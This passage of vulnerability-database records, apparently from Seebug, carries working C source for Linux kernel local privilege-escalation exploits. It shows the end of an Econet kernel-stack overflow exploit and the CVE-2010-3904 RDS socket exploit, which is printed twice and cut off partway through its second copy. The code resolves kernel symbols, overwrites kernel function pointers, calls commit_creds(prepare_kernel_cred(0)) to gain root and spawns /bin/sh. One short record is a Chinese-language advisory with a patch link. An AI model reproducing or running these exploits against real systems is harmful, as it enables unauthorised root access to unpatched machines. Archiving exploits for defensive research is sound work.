S_IRWXO);\r\n\tif (shm < 0) {\r\n\t\tprintf("[-] failed creating shared memory, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = ftruncate(shm, sizeof(struct region));\r\n\tif (ret != 0) {\r\n\t\tprintf("[-] failed resizing shared memory, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tregion = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);\r\n\tmemset(region, KSTACK_UNINIT, sizeof(struct region));\r\n\r\n\t/* parent kstack self-discovery */\r\n\tregion->parent = get_kstack();\r\n\r\n\tprintf("[+] found parent kstack at 0x%lx\\n", region->parent);\r\n\r\n\t/* fork and discover children with adjacently-allocated kernel stacks */\r\n\tfor (i = 0; i < NPROC; ++i) {\r\n\t\tpid = fork();\r\n\r\n\t\tif (pid > 0) {\r\n\t\t\ttype = KSTACK_PARENT;\r\n\t\t\tcontinue;\r\n\t\t} else if (pid == 0) {\r\n\t\t\t/* children do kstack self-discovery */\r\n\t\t\tregion->addrs[i] = get_kstack();\r\n\r\n\t\t\t/* children sleep until parent has found adjacent children */\r\n\t\t\twhile (1) {\r\n\t\t\t\tsleep(1);\r\n\t\t\t\tif (region->addrs[i] == KSTACK_DIE) {\r\n\t\t\t\t\t/* parent doesn't need us :-( */\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t} else if (region->addrs[i] == KSTACK_UPPER) {\r\n\t\t\t\t\t/* we're the upper adjacent process */\r\n\t\t\t\t\ttype = KSTACK_UPPER;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t} else if (region->addrs[i] == KSTACK_LOWER) {\r\n\t\t\t\t\t/* we're the lower adjacent process */\r\n\t\t\t\t\ttype = KSTACK_LOWER;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\t} else {\r\n\t\t\tprintf("[-] fork failed, aborting!\\n");\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\r\n\treturn type;\r\n}\r\n\r\nvoid\r\ndo_parent(void)\r\n{\r\n\tint i, j, upper, lower;\r\n\r\n\t/* parent sleeps until we've discovered all the child kstacks */\r\n\twhile (1) {\r\n\t\tsleep(1);\r\n\t\tfor (i = 0; i < NPROC; ++i) {\r\n\t\t\tif (region->addrs[i] == KSTACK_UNINIT) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (i == NPROC) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\t/* figure out if we have any adjacent child kstacks */\r\n\tfor (i = 0; i < NPROC; ++i) {\r\n\t\tfor (j = 0; j < NPROC; ++j) {\r\n\t\t\tif (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (j != NPROC) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif (i == NPROC && j == NPROC) {\r\n\t\tprintf("[-] failed to find adjacent kstacks, try again!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tupper = i;\r\n\tlower = j;\r\n\r\n\tprintf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\\n", region->addrs[lower], region->addrs[upper]);\r\n\r\n\t/* signal to non-adjacent children to die */\r\n\tfor (i = 0; i < NPROC; ++i) {\r\n\t\tif (i != upper && i != lower) {\r\n\t\t\tregion->addrs[i] = KSTACK_DIE;\r\n\t\t}\r\n\t}\r\n\r\n\t/* signal adjacent children to continue on */\r\n\tregion->addrs[upper] = KSTACK_UPPER;\r\n\tregion->addrs[lower] = KSTACK_LOWER;\r\n\r\n\t/* parent sleeps until child has clobbered the fptr */\r\n\twhile (1) {\r\n\t\tsleep(1);\r\n\t\tif (region->parent == KSTACK_CLOBBER) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\tprintf("[+] escalating privileges...\\n");\r\n\r\n\t/* trigger our clobbered fptr */\r\n\tsyscall(__NR_restart_syscall);\r\n\r\n\t/* our privileges should be escalated now */\r\n\tif (getuid() != 0) {\r\n\t\tprintf("[-] privilege escalation failed, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] launching root shell!\\n");\r\n\r\n\texecl("/bin/sh", "/bin/sh", NULL);\r\n}\r\n\r\nvoid\r\ndo_child_upper(void)\r\n{\r\n\tint i, ret, eco_sock;\r\n\tstruct sockaddr_ec eco_addr;\r\n\tstruct msghdr eco_msg;\r\n\tstruct iovec iovs[IOVS];\r\n\tstruct ifreq ifr;\r\n\tchar *target;\r\n\r\n\t/* calculate payload target, skip prologue */\r\n\ttarget = (char *) payload_child;\r\n\ttarget += 4;\r\n\t\r\n\t/* give lower child a chance to enter its wait4 call */\r\n\tsleep(1);\r\n\r\n\t/* write some zeros */\r\n\tfor (i = 0; i < STACK_OFFSET; ++i) {\r\n\t\tiovs[i].iov_base = (void *) 0x0;\r\n\t\tiovs[i].iov_len = 0;\r\n\t}\r\n\r\n\t/* overwrite saved ia32_sysret address on stack */\r\n\tiovs[STACK_OFFSET].iov_base = (void *) target;\r\n\tiovs[STACK_OFFSET].iov_len = 0x0246;\r\n\r\n\t/* force abort via EFAULT */\r\n\tfor (i = STACK_OFFSET + 1; i < IOVS; ++i) {\r\n\t\tiovs[i].iov_base = (void *) 0xffffffff00000000;\r\n\t\tiovs[i].iov_len = 0;\r\n\t}\r\n\r\n\t/* create econet socket */\r\n\teco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n\tif (eco_sock < 0) {\r\n\t\tprintf("[-] failed creating econet socket, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemset(&ifr, 0, sizeof(ifr));\r\n\tstrcpy(ifr.ifr_name, "lo");\r\n\r\n\t/* trick econet into associated with the loopback */\r\n\tret = ioctl(eco_sock, SIOCSIFADDR, &ifr);\r\n\tif (ret != 0) {\r\n\t\tprintf("[-] failed setting interface address, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemset(&eco_addr, 0, sizeof(eco_addr));\r\n\tmemset(&eco_msg, 0, sizeof(eco_msg));\r\n\teco_msg.msg_name = &eco_addr;\r\n\teco_msg.msg_namelen = sizeof(eco_addr);\r\n\teco_msg.msg_flags = 0;\r\n\teco_msg.msg_iov = &iovs[0];\r\n\teco_msg.msg_iovlen = IOVS;\r\n\r\n\tprintf("[+] upper child triggering stack overflow...\\n");\r\n\r\n\t/* trigger the kstack overflow into lower child's kstack */\r\n\tret = sendmsg(eco_sock, &eco_msg, 0);\r\n\tif (ret != -1 || errno != EFAULT) {\r\n\t\tprintf("[-] sendmsg succeeded unexpectedly, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tclose(eco_sock);\r\n}\r\n\r\nvoid\r\ndo_child_lower(void)\r\n{\r\n\tint pid;\r\n\r\n\tprintf("[+] lower child spawning a helper...\\n");\r\n\r\n\t/* fork off a helper to wait4 on */\r\n\tpid = fork();\r\n\tif (pid == 0) {\r\n\t\tprintf("[+] helper going to sleep...\\n");\r\n\t\tsleep(5);\r\n\t\tprintf("[+] helper woke up\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] lower child calling compat_sys_wait4 on helper...\\n");\r\n\r\n\t/* syscall(NR_WAIT4, pid, 0, 0, 0) */\r\n\tasm volatile (\r\n\t\t"push %%rax\\n"\r\n\t\t"push %%rbx\\n"\r\n\t\t"push %%rcx\\n"\r\n\t\t"push %%rdx\\n"\r\n\t\t"push %%rsi\\n"\r\n\t\t"movl %0, %%eax\\n"\r\n\t\t"movl %1, %%ebx\\n"\r\n\t\t"movl %2, %%ecx\\n"\r\n\t\t"movl %3, %%edx\\n"\r\n\t\t"movl %4, %%esi\\n"\r\n\t\t"int $0x80\\n"\r\n\t\t"pop %%rsi\\n"\r\n\t\t"pop %%rdx\\n"\r\n\t\t"pop %%rcx\\n"\r\n\t\t"pop %%rbx\\n"\r\n\t\t"pop %%rax\\n"\r\n\t\t:\r\n\t\t: "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)\r\n\t\t: "memory", "rax", "rbx", "rcx", "rdx", "rsi"\r\n\t);\r\n\r\n\tprintf("[+] lower child returned from compat_sys_wait4\\n");\r\n\r\n\tprintf("[+] parent's restart_block has been clobbered\\n");\r\n\r\n\t/* signal parent that our fptr should now be clobbered */\r\n\tregion->parent = KSTACK_CLOBBER;\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint type;\r\n\r\n\tif (sizeof(unsigned long) != 8) {\r\n\t\tprintf("[-] x86_64 only, sorry!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] looking for symbols...\\n");\r\n \r\n\tcommit_creds = (_commit_creds) get_symbol("commit_creds");\r\n\tif (!commit_creds) {\r\n\t\tprintf("[-] symbol table not available, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n \r\n\tprepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");\r\n\tif (!prepare_kernel_cred) {\r\n\t\tprintf("[-] symbol table not available, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tia32_sysret = get_symbol("ia32_sysret");\r\n\tif (!ia32_sysret) {\r\n\t\tprintf("[-] symbol table not available, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] spawning children to achieve adjacent kstacks...\\n");\r\n\r\n\ttype = get_adjacent_kstacks();\r\n\r\n\tif (type == KSTACK_PARENT) {\r\n\t\tdo_parent();\r\n\t} else if (type == KSTACK_UPPER) {\r\n\t\tdo_child_upper();\r\n\t} else if (type == KSTACK_LOWER) {\r\n\t\tdo_child_lower();\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72066", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:07:20", "description": "No description provided by source.", "cvss3": {}, "published": "2010-10-26T00:00:00", "type": "seebug", "title": "Linux RDS Protocol Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20191", "id": "SSV:20191", "sourceData": "\n Source: http://www.vsecurity.com/resources/advisory/20101019-1/\r\n \r\n/*\r\n * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit\r\n * CVE-2010-3904\r\n * by Dan Rosenberg <drosenberg@vsecurity.com>\r\n *\r\n * Copyright 2010 Virtual Security Research, LLC\r\n *\r\n * The handling functions for sending and receiving RDS messages\r\n * use unchecked __copy_*_user_inatomic functions without any\r\n * access checks on user-provided pointers. As a result, by\r\n * passing a kernel address as an iovec base address in recvmsg-style\r\n * calls, a local user can overwrite arbitrary kernel memory, which\r\n * can easily be used to escalate privileges to root. Alternatively,\r\n * an arbitrary kernel read can be performed via sendmsg calls.\r\n *\r\n * This exploit is simple - it resolves a few kernel symbols,\r\n * sets the security_ops to the default structure, then overwrites\r\n * a function pointer (ptrace_traceme) in that structure to point\r\n * to the payload. After triggering the payload, the original\r\n * value is restored. Hard-coding the offset of this function\r\n * pointer is a bit inelegant, but I wanted to keep it simple and\r\n * architecture-independent (i.e. no inline assembly).\r\n *\r\n * The vulnerability is yet another example of why you shouldn't\r\n * allow loading of random packet families unless you actually\r\n * need them.\r\n *\r\n * Greets to spender, kees, taviso, hawkes, team lollerskaters,\r\n * joberheide, bla, sts, and VSR\r\n *\r\n */\r\n \r\n \r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n \r\n#define RECVPORT 5555\r\n#define SENDPORT 6666\r\n \r\nint prep_sock(int port)\r\n{\r\n \r\n int s, ret;\r\n struct sockaddr_in addr;\r\n \r\n s = socket(PF_RDS, SOCK_SEQPACKET, 0);\r\n \r\n if(s < 0) {\r\n printf("[*] Could not open socket.\\n");\r\n exit(-1);\r\n }\r\n \r\n memset(&addr, 0, sizeof(addr));\r\n \r\n addr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(port);\r\n \r\n ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));\r\n \r\n if(ret < 0) {\r\n printf("[*] Could not bind socket.\\n");\r\n exit(-1);\r\n }\r\n \r\n return s;\r\n \r\n}\r\n \r\nvoid get_message(unsigned long address, int sock)\r\n{\r\n \r\n recvfrom(sock, (void *)address, sizeof(void *), 0,\r\n NULL, NULL);\r\n \r\n}\r\n \r\nvoid send_message(unsigned long value, int sock)\r\n{\r\n \r\n int size, ret;\r\n struct sockaddr_in recvaddr;\r\n struct msghdr msg;\r\n struct iovec iov;\r\n unsigned long buf;\r\n \r\n memset(&recvaddr, 0, sizeof(recvaddr));\r\n \r\n size = sizeof(recvaddr);\r\n \r\n recvaddr.sin_port = htons(RECVPORT);\r\n recvaddr.sin_family = AF_INET;\r\n recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n \r\n memset(&msg, 0, sizeof(msg));\r\n \r\n msg.msg_name = &recvaddr;\r\n msg.msg_namelen = sizeof(recvaddr);\r\n msg.msg_iovlen = 1;\r\n \r\n buf = value;\r\n \r\n iov.iov_len = sizeof(buf);\r\n iov.iov_base = &buf;\r\n \r\n msg.msg_iov = &iov;\r\n \r\n ret = sendmsg(sock, &msg, 0);\r\n if(ret < 0) {\r\n printf("[*] Something went wrong sending.\\n");\r\n exit(-1);\r\n }\r\n}\r\n \r\nvoid write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)\r\n{\r\n \r\n if(!fork()) {\r\n sleep(1);\r\n send_message(value, sendsock);\r\n exit(1);\r\n }\r\n else {\r\n get_message(addr, recvsock);\r\n wait(NULL);\r\n }\r\n \r\n}\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\nint __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n \r\n commit_creds(prepare_kernel_cred(0));\r\n return -1; \r\n \r\n}\r\n \r\n/* thanks spender... */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n \r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, " [+] Resolved %s to %p%s\\n", name, (void *)addr, rep ? " (via System.map)" : "");\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n /* didn't find the symbol, let's retry with the System.map\r\n dedicated to the pointlessness of Russell Coker's SELinux\r\n test machine (why does he keep upgrading the kernel if\r\n "all necessary security can be provided by SE Linux"?)\r\n */\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n \r\nint main(int argc, char * argv[])\r\n{\r\n unsigned long sec_ops, def_ops, cap_ptrace, target;\r\n int sendsock, recvsock;\r\n struct utsname ver;\r\n \r\n printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\\n");\r\n printf("[*] by Dan Rosenberg\\n");\r\n \r\n uname(&ver);\r\n \r\n if(strncmp(ver.release, "2.6.3", 5)) {\r\n printf("[*] Your kernel is not vulnerable.\\n");\r\n return -1;\r\n } \r\n \r\n /* Resolve addresses of relevant symbols */\r\n printf("[*] Resolving kernel addresses...\\n");\r\n sec_ops = get_kernel_sym("security_ops");\r\n def_ops = get_kernel_sym("default_security_ops");\r\n cap_ptrace = get_kernel_sym("cap_ptrace_traceme");\r\n commit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n \r\n if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {\r\n printf("[*] Failed to resolve kernel symbols.\\n");\r\n return -1;\r\n }\r\n \r\n /* Calculate target */\r\n target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));\r\n \r\n sendsock = prep_sock(SENDPORT);\r\n recvsock = prep_sock(RECVPORT);\r\n \r\n /* Reset security ops */\r\n printf("[*] Overwriting security ops...\\n");\r\n write_to_mem(sec_ops, def_ops, sendsock, recvsock);\r\n \r\n /* Overwrite ptrace_traceme security op fptr */\r\n printf("[*] Overwriting function pointer...\\n");\r\n write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);\r\n \r\n /* Trigger the payload */\r\n printf("[*] Triggering payload...\\n");\r\n ptrace(PTRACE_TRACEME, 1, NULL, NULL);\r\n \r\n /* Restore the ptrace_traceme security op */\r\n printf("[*] Restoring function pointer...\\n");\r\n write_to_mem(target, cap_ptrace, sendsock, recvsock);\r\n \r\n if(getuid()) {\r\n printf("[*] Exploit failed to get root.\\n");\r\n return -1;\r\n }\r\n \r\n printf("[*] Got root!\\n");\r\n execl("/bin/sh", "sh", NULL);\r\n \r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20191", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:07:41", "description": "BUGTRAQ ID: 44219\r\nCVE ID: CVE-2010-3904\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\n\u5728Linux\u4e0a\uff0c\u4f7f\u7528\u4e86iovec\u7ed3\u6784\u6267\u884crecvmsg()\u6837\u5f0f\u5957\u63a5\u5b57\u8c03\u7528\u4ee5\u5141\u8bb8\u7528\u6237\u6307\u5b9a\u7528\u4e8e\u63a5\u6536\u5957\u63a5\u5b57\u6570\u636e\u7684\u7f13\u51b2\u533a\u57fa\u5740\u548c\u5927\u5c0f\u3002\u6bcf\u4e2a\u62a5\u6587\u5bb6\u65cf\u8d1f\u8d23\u5b9a\u4e49\u62f7\u8d1d\u5957\u63a5\u5b57\u6570\u636e\u7684\u51fd\u6570\uff0c\u5185\u6838\u63a5\u6536\u5230\u8fd9\u4e9b\u6570\u636e\u540e\u8fd4\u56de\u7ed9\u7528\u6237\u7a7a\u95f4\u4ee5\u4fbf\u7528\u6237\u7a0b\u5e8f\u5904\u7406\u6240\u63a5\u6536\u5230\u7684\u7f51\u7edc\u6570\u636e\u3002\r\n\r\n\u5728\u5c06\u6570\u636e\u62f7\u8d1d\u5230\u7528\u6237\u7a7a\u95f4\u65f6\uff0cRDS\u534f\u8bae\u6ca1\u6709\u786e\u8ba4\u7528\u6237\u6240\u63d0\u4f9biovec\u7ed3\u6784\u7684\u57fa\u5740\u6307\u5411\u4e86\u6709\u6548\u7684\u7528\u6237\u7a7a\u95f4\u5730\u5740\u4fbf\u4f7f\u7528 __copy_to_user_inatomic()\u51fd\u6570\u62f7\u8d1d\u6570\u636e\u3002\u56e0\u6b64\uff0c\u5982\u679c\u63d0\u4f9b\u5185\u6838\u5730\u5740\u4e3aiovec\u57fa\u5740\u5e76\u53d1\u5e03recvmsg()\u6837\u5f0f\u5957\u63a5\u5b57\u8c03\u7528\uff0c\u672c\u5730\u7528\u6237\u5c31\u53ef\u4ee5\u5411\u5185\u6838\u5185\u5b58\u4e2d\u5199\u5165\u4efb\u610f\u6570\u636e\uff0c\u5bfc\u81f4root\u7528\u6237\u6743\u9650\u63d0\u5347\u3002\n\nLinux kernel <= 2.6.36-rc8\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f", "cvss3": {}, "published": "2010-10-26T00:00:00", "type": "seebug", "title": "Linux Kernel RDS\u534f\u8bae\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20199", "id": "SSV:20199", "sourceData": "\n http://sebug.net/exploit/20191/\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20199", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:46:25", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70036", "id": "SSV:70036", "sourceData": "\n //source: http://www.vsecurity.com/resources/advisory/20101019-1/\r\n\r\n/* \r\n * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit\r\n * CVE-2010-3904\r\n * by Dan Rosenberg <drosenberg@vsecurity.com>\r\n *\r\n * Copyright 2010 Virtual Security Research, LLC\r\n *\r\n * The handling functions for sending and receiving RDS messages\r\n * use unchecked __copy_*_user_inatomic functions without any\r\n * access checks on user-provided pointers. As a result, by\r\n * passing a kernel address as an iovec base address in recvmsg-style\r\n * calls, a local user can overwrite arbitrary kernel memory, which\r\n * can easily be used to escalate privileges to root. Alternatively,\r\n * an arbitrary kernel read can be performed via sendmsg calls.\r\n *\r\n * This exploit is simple - it resolves a few kernel symbols,\r\n * sets the security_ops to the default structure, then overwrites\r\n * a function pointer (ptrace_traceme) in that structure to point\r\n * to the payload. After triggering the payload, the original\r\n * value is restored. Hard-coding the offset of this function\r\n * pointer is a bit inelegant, but I wanted to keep it simple and\r\n * architecture-independent (i.e. no inline assembly).\r\n *\r\n * The vulnerability is yet another example of why you shouldn't\r\n * allow loading of random packet families unless you actually\r\n * need them.\r\n *\r\n * Greets to spender, kees, taviso, hawkes, team lollerskaters,\r\n * joberheide, bla, sts, and VSR\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n\r\n#define RECVPORT 5555 \r\n#define SENDPORT 6666\r\n\r\nint prep_sock(int port)\r\n{\r\n\t\r\n\tint s, ret;\r\n\tstruct sockaddr_in addr;\r\n\r\n\ts = socket(PF_RDS, SOCK_SEQPACKET, 0);\r\n\r\n\tif(s < 0) {\r\n\t\tprintf("[*] Could not open socket.\\n");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tmemset(&addr, 0, sizeof(addr));\r\n\r\n\taddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(port);\r\n\r\n\tret = bind(s, (struct sockaddr *)&addr, sizeof(addr));\r\n\r\n\tif(ret < 0) {\r\n\t\tprintf("[*] Could not bind socket.\\n");\r\n\t\texit(-1);\r\n\t}\r\n\r\n\treturn s;\r\n\r\n}\r\n\r\nvoid get_message(unsigned long address, int sock)\r\n{\r\n\r\n\trecvfrom(sock, (void *)address, sizeof(void *), 0,\r\n\t\t NULL, NULL);\r\n\r\n}\r\n\r\nvoid send_message(unsigned long value, int sock)\r\n{\r\n\t\r\n\tint size, ret;\r\n\tstruct sockaddr_in recvaddr;\r\n\tstruct msghdr msg;\r\n\tstruct iovec iov;\r\n\tunsigned long buf;\r\n\t\r\n\tmemset(&recvaddr, 0, sizeof(recvaddr));\r\n\r\n\tsize = sizeof(recvaddr);\r\n\r\n\trecvaddr.sin_port = htons(RECVPORT);\r\n\trecvaddr.sin_family = AF_INET;\r\n\trecvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n\r\n\tmemset(&msg, 0, sizeof(msg));\r\n\t\r\n\tmsg.msg_name = &recvaddr;\r\n\tmsg.msg_namelen = sizeof(recvaddr);\r\n\tmsg.msg_iovlen = 1;\r\n\t\r\n\tbuf = value;\r\n\r\n\tiov.iov_len = sizeof(buf);\r\n\tiov.iov_base = &buf;\r\n\r\n\tmsg.msg_iov = &iov;\r\n\r\n\tret = sendmsg(sock, &msg, 0);\r\n\tif(ret < 0) {\r\n\t\tprintf("[*] Something went wrong sending.\\n");\r\n\t\texit(-1);\r\n\t}\r\n}\r\n\r\nvoid write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)\r\n{\r\n\r\n\tif(!fork()) {\r\n\t\t\tsleep(1);\r\n\t\t\tsend_message(value, sendsock);\r\n\t\t\texit(1);\r\n\t}\r\n\telse {\r\n\t\tget_message(addr, recvsock);\r\n\t\twait(NULL);\r\n\t}\r\n\r\n}\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n\r\nint __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\treturn -1;\t\r\n\r\n}\r\n\r\n/* thanks spender... */\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy;\r\n\tchar sname[512];\r\n\tstruct utsname ver;\r\n\tint ret;\r\n\tint rep = 0;\r\n\tint oldstyle = 0;\r\n\r\n\tf = fopen("/proc/kallsyms", "r");\r\n\tif (f == NULL) {\r\n\t\tf = fopen("/proc/ksyms", "r");\r\n\t\tif (f == NULL)\r\n\t\t\tgoto fallback;\r\n\t\toldstyle = 1;\r\n\t}\r\n\r\nrepeat:\r\n\tret = 0;\r\n\twhile(ret != EOF) {\r\n\t\tif (!oldstyle)\r\n\t\t\tret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n\t\telse {\r\n\t\t\tret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n\t\t\tif (ret == 2) {\r\n\t\t\t\tchar *p;\r\n\t\t\t\tif (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n\t\t\t\t\tcontinue;\r\n\t\t\t\tp = strrchr(sname, '_');\r\n\t\t\t\tif (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n\t\t\t\t\tp = p - 4;\r\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_')\r\n\t\t\t\t\t\tp--;\r\n\t\t\t\t\t*p = '\\0';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, "%s\\n", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfprintf(stdout, " [+] Resolved %s to %p%s\\n", name, (void *)addr, rep ? " (via System.map)" : "");\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\tif (rep)\r\n\t\treturn 0;\r\nfallback:\r\n\t/* didn't find the symbol, let's retry with the System.map\r\n\t dedicated to the pointlessness of Russell Coker's SELinux\r\n\t test machine (why does he keep upgrading the kernel if\r\n\t "all necessary security can be provided by SE Linux"?)\r\n\t*/\r\n\tuname(&ver);\r\n\tif 